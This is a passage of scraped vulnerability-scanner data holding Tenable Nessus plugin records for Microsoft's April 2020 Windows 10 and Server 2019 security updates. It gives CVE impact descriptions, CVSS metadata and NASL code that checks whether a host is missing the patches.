successfully\n exploited this vulnerability could run arbitrary code\n with elevated system privileges. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0983)\n\n - An elevation of privilege vulnerability exists in the\n way the Windows Push Notification Service handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-0940,\n CVE-2020-1001, CVE-2020-1006, CVE-2020-1017)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0958)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-0982,\n CVE-2020-0987, CVE-2020-1005)\n\n - An information disclosure vulnerability exists when the\n Windows Push Notification Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. An authenticated\n attacker could exploit this vulnerability by running a\n specially crafted application. The update addresses the\n vulnerability by correcting how the Windows Push\n Notification Service handles objects in memory.\n (CVE-2020-1016)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0895, CVE-2020-0966,\n CVE-2020-0967)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0952)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0913, CVE-2020-1000, CVE-2020-1003)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0784, CVE-2020-0888)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0964)\n\n - An elevation of privilege vulnerability exists when the\n Windows System Assessment Tool improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows System Assessment Tool\n handles file operations. (CVE-2020-1011)\n\n - A remote code execution vulnerability exists in the way \n that the ChakraCore scripting engine handles objects in \n memory. The vulnerability could corrupt memory in such a \n way that an attacker could execute arbitrary code in the \n context of the current user. An attacker who successfully \n exploited the vulnerability could gain the same user \n rights as the current user. If the current user is logged \n on with administrative user rights, an attacker who \n successfully exploited the vulnerability could take \n control of an affected system. An attacker could then \n install programs; view, change, or delete data; or create \n new accounts with full user rights. (CVE-2020-0969, \n CVE-2020-0970)\");\n # https://support.microsoft.com/en-us/help/4550922/windows-10-update-kb4550922\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9f6f3b84\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4550922.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1008\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1020\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-04\";\nkbs = make_list('4550922');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"17134\",\n rollup_date:\"04_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4550922])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-05T14:16:45", "description": "The remote Windows host is missing security update 4549949.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the Windows Update Stack fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0985, CVE-2020-0996)\n\n - An elevation of privilege vulnerability exists when a Windows scheduled task improperly handles file redirections. An attacker who successfully exploited this vulnerability could delete a targeted file they would not have permissions to. (CVE-2020-0936)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-0821, CVE-2020-1007)\n\n - An elevation of privilege vulnerability exists when the Windows WpcDesktopMonSvc improperly manages memory.\n (CVE-2020-0934)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0699, CVE-2020-0962)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959, CVE-2020-0960, CVE-2020-0988, CVE-2020-0992, CVE-2020-0994, CVE-2020-0995, CVE-2020-0999, CVE-2020-1008)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could overwrite files in arbitrary locations with elevated permissions. (CVE-2020-0942)\n\n - A remoted code execution vulnerability exists in the way that Microsoft Windows Codecs Library handles objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code. Exploitation of the vulnerability requires that a program process a specially crafted image file. The update addresses the vulnerability by correcting how Microsoft Windows Codecs Library handles objects in memory. (CVE-2020-0965)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The security update addresses the vulnerability by correcting how the Connected User Experiences and Telemetry Service handles file operations. (CVE-2020-0944, CVE-2020-1029)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-0937, CVE-2020-0945, CVE-2020-0946)\n\n - An elevation of privilege vulnerability exists in the way that the Microsoft Store Install Service handles file operations in protected locations. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi- master font - Adobe Type 1 PostScript format. For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who successfully exploited the vulnerability could execute code in an AppContainer sandbox context with limited privileges and capabilities. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as convincing a user to open a specially crafted document or viewing it in the Windows Preview pane. The update addresses the vulnerability by correcting how the Windows Adobe Type Manager Library handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - A remote code execution vulnerability exists when Windows Hyper-V on a host server fails to properly validate input from an authenticated user on a guest operating system. (CVE-2020-0910)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. (CVE-2020-1094)\n\n - An information disclosure vulnerability exists when certain central processing units (CPU) speculatively access memory. An attacker who successfully exploited the vulnerability could read privileged data across trust boundaries. (CVE-2020-0955)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-0948, CVE-2020-0949, CVE-2020-0950)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited the vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0687)\n\n - An elevation of privilege vulnerability exists in the Microsoft Windows Update Client when it does not properly handle privileges. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-1014)\n\n - A denial of service vulnerability exists when Windows improperly handles objects in memory. An attacker who successfully exploited the vulnerability could cause a target system to stop responding. (CVE-2020-0794)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the way that the User-Mode Power Service (UMPS) handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1015)\n\n - An elevation of privilege vulnerability exists when the Windows Delivery Optimization service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0983)\n\n - An elevation of privilege vulnerability exists in the way the Windows Push Notification Service handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-0940, CVE-2020-1001, CVE-2020-1006, CVE-2020-1017)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0958)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0982, CVE-2020-0987, CVE-2020-1005)\n\n - An information disclosure vulnerability exists when the Windows Push Notification Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. An authenticated attacker could exploit this vulnerability by running a specially crafted application. The update addresses the vulnerability by correcting how the Windows Push Notification Service handles objects in memory.\n (CVE-2020-1016)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0895, CVE-2020-0966, CVE-2020-0967)\n\n - An elevation of privilege vulnerability exists when Windows Hyper-V on a host server fails to properly handle objects in memory. An attacker who successfully exploited these vulnerabilities could gain elevated privileges on a target operating system. This vulnerability by itself does not allow arbitrary code to be run. However, this vulnerability could be used in conjunction with one or more vulnerabilities (e.g. a remote code execution vulnerability and another elevation of privilege) that could take advantage of the elevated privileges when running. The update addresses the vulnerabilities by correcting how Windows Hyper-V handles objects in memory. (CVE-2020-0917, CVE-2020-0918)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-0952)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0913, CVE-2020-1000, CVE-2020-1003)\n\n - An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0784, CVE-2020-0888)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0964)\n\n - A denial of service vulnerability exists in Windows DNS when it fails to properly handle queries. An attacker who successfully exploited this vulnerability could cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An elevation of privilege vulnerability exists when the Windows System Assessment Tool improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows System Assessment Tool handles file operations. (CVE-2020-1011)\n\n - A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0969, CVE-2020-0970)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-04-14T00:00:00", "type": "nessus", "title": "KB4549949: Windows 10 Version 1809 and Windows Server 2019 April 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0687", "CVE-2020-0699", "CVE-2020-0784", "CVE-2020-0794", "CVE-2020-0821", "CVE-2020-0888", "CVE-2020-0889", "CVE-2020-0895", "CVE-2020-0907", "CVE-2020-0910", "CVE-2020-0913", "CVE-2020-0917", "CVE-2020-0918", "CVE-2020-0934", "CVE-2020-0936", "CVE-2020-0937", "CVE-2020-0938", "CVE-2020-0940", "CVE-2020-0942", "CVE-2020-0944", "CVE-2020-0945", "CVE-2020-0946", "CVE-2020-0948", "CVE-2020-0949", "CVE-2020-0950", "CVE-2020-0952", "CVE-2020-0953", "CVE-2020-0955", "CVE-2020-0956", "CVE-2020-0958", "CVE-2020-0959", "CVE-2020-0960", "CVE-2020-0962", "CVE-2020-0964", "CVE-2020-0965", "CVE-2020-0966", "CVE-2020-0967", "CVE-2020-0968", "CVE-2020-0969", "CVE-2020-0970", "CVE-2020-0982", "CVE-2020-0983", "CVE-2020-0985", "CVE-2020-0987", "CVE-2020-0988", "CVE-2020-0992", "CVE-2020-0993", "CVE-2020-0994", "CVE-2020-0995", "CVE-2020-0996", "CVE-2020-0999", "CVE-2020-1000", "CVE-2020-1001", "CVE-2020-1003", "CVE-2020-1004", "CVE-2020-1005", "CVE-2020-1006", "CVE-2020-1007", "CVE-2020-1008", "CVE-2020-1009", "CVE-2020-1011", "CVE-2020-1014", "CVE-2020-1015", "CVE-2020-1016", "CVE-2020-1017", "CVE-2020-1020", "CVE-2020-1027", "CVE-2020-1029", "CVE-2020-1094"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_APR_4549949.NASL", "href": "https://www.tenable.com/plugins/nessus/135463", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135463);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-0687\",\n \"CVE-2020-0699\",\n \"CVE-2020-0784\",\n \"CVE-2020-0794\",\n \"CVE-2020-0821\",\n \"CVE-2020-0888\",\n \"CVE-2020-0889\",\n \"CVE-2020-0895\",\n \"CVE-2020-0907\",\n \"CVE-2020-0910\",\n \"CVE-2020-0913\",\n \"CVE-2020-0917\",\n \"CVE-2020-0918\",\n \"CVE-2020-0934\",\n \"CVE-2020-0936\",\n \"CVE-2020-0937\",\n \"CVE-2020-0938\",\n \"CVE-2020-0940\",\n \"CVE-2020-0942\",\n \"CVE-2020-0944\",\n \"CVE-2020-0945\",\n \"CVE-2020-0946\",\n \"CVE-2020-0948\",\n \"CVE-2020-0949\",\n \"CVE-2020-0950\",\n \"CVE-2020-0952\",\n \"CVE-2020-0953\",\n \"CVE-2020-0955\",\n \"CVE-2020-0956\",\n \"CVE-2020-0958\",\n \"CVE-2020-0959\",\n \"CVE-2020-0960\",\n \"CVE-2020-0962\",\n \"CVE-2020-0964\",\n \"CVE-2020-0965\",\n \"CVE-2020-0966\",\n \"CVE-2020-0967\",\n \"CVE-2020-0968\",\n \"CVE-2020-0969\",\n \"CVE-2020-0970\",\n \"CVE-2020-0982\",\n \"CVE-2020-0983\",\n \"CVE-2020-0985\",\n \"CVE-2020-0987\",\n \"CVE-2020-0988\",\n \"CVE-2020-0992\",\n \"CVE-2020-0993\",\n \"CVE-2020-0994\",\n \"CVE-2020-0995\",\n \"CVE-2020-0996\",\n \"CVE-2020-0999\",\n \"CVE-2020-1000\",\n \"CVE-2020-1001\",\n \"CVE-2020-1003\",\n \"CVE-2020-1004\",\n \"CVE-2020-1005\",\n \"CVE-2020-1006\",\n \"CVE-2020-1007\",\n \"CVE-2020-1008\",\n \"CVE-2020-1009\",\n \"CVE-2020-1011\",\n \"CVE-2020-1014\",\n \"CVE-2020-1015\",\n \"CVE-2020-1016\",\n \"CVE-2020-1017\",\n \"CVE-2020-1020\",\n \"CVE-2020-1027\",\n \"CVE-2020-1029\",\n \"CVE-2020-1094\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0139-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0156-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"MSKB\", value:\"4549949\");\n script_xref(name:\"MSFT\", value:\"MS20-4549949\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0031\");\n\n script_name(english:\"KB4549949: Windows 10 Version 1809 and Windows Server 2019 April 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4549949.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the\n Windows Update Stack fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0985, CVE-2020-0996)\n\n - An elevation of privilege vulnerability exists when a\n Windows scheduled task improperly handles file\n redirections. An attacker who successfully exploited\n this vulnerability could delete a targeted file they\n would not have permissions to. (CVE-2020-0936)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0821, CVE-2020-1007)\n\n - An elevation of privilege vulnerability exists when the\n Windows WpcDesktopMonSvc improperly manages memory.\n (CVE-2020-0934)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0699, CVE-2020-0962)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959,\n CVE-2020-0960, CVE-2020-0988, CVE-2020-0992,\n CVE-2020-0994, CVE-2020-0995, CVE-2020-0999,\n CVE-2020-1008)\n\n - An elevation of privilege vulnerability exists when\n Connected User Experiences and Telemetry Service\n improperly handles file operations. An attacker who\n successfully exploited this vulnerability could\n overwrite files in arbitrary locations with elevated\n permissions. (CVE-2020-0942)\n\n - A remoted code execution vulnerability exists in the way\n that Microsoft Windows Codecs Library handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code. Exploitation\n of the vulnerability requires that a program process a\n specially crafted image file. The update addresses the\n vulnerability by correcting how Microsoft Windows Codecs\n Library handles objects in memory. (CVE-2020-0965)\n\n - An elevation of privilege vulnerability exists when\n Connected User Experiences and Telemetry Service\n improperly handles file operations. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. An attacker could\n exploit this vulnerability by running a specially\n crafted application on the victim system. The security\n update addresses the vulnerability by correcting how the\n Connected User Experiences and Telemetry Service handles\n file operations. (CVE-2020-0944, CVE-2020-1029)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-0937,\n CVE-2020-0945, CVE-2020-0946)\n\n - An elevation of privilege vulnerability exists in the\n way that the Microsoft Store Install Service handles\n file operations in protected locations. An attacker who\n successfully exploited the vulnerability could execute\n code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles a specially-crafted multi-\n master font - Adobe Type 1 PostScript format. For all\n systems except Windows 10, an attacker who successfully\n exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who\n successfully exploited the vulnerability could execute\n code in an AppContainer sandbox context with limited\n privileges and capabilities. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as convincing a user to open a\n specially crafted document or viewing it in the Windows\n Preview pane. The update addresses the vulnerability by\n correcting how the Windows Adobe Type Manager Library\n handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. (CVE-2020-0910)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-1094)\n\n - An information disclosure vulnerability exists when\n certain central processing units (CPU) speculatively\n access memory. An attacker who successfully exploited\n the vulnerability could read privileged data across\n trust boundaries. (CVE-2020-0955)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-0948,\n CVE-2020-0949, CVE-2020-0950)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0687)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Windows Update Client when it does not\n properly handle privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1014)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-0794)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the\n way that the User-Mode Power Service (UMPS) handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1015)\n\n - An elevation of privilege vulnerability exists when the\n Windows Delivery Optimization service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code\n with elevated system privileges. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0983)\n\n - An elevation of privilege vulnerability exists in the\n way the Windows Push Notification Service handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-0940,\n CVE-2020-1001, CVE-2020-1006, CVE-2020-1017)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts 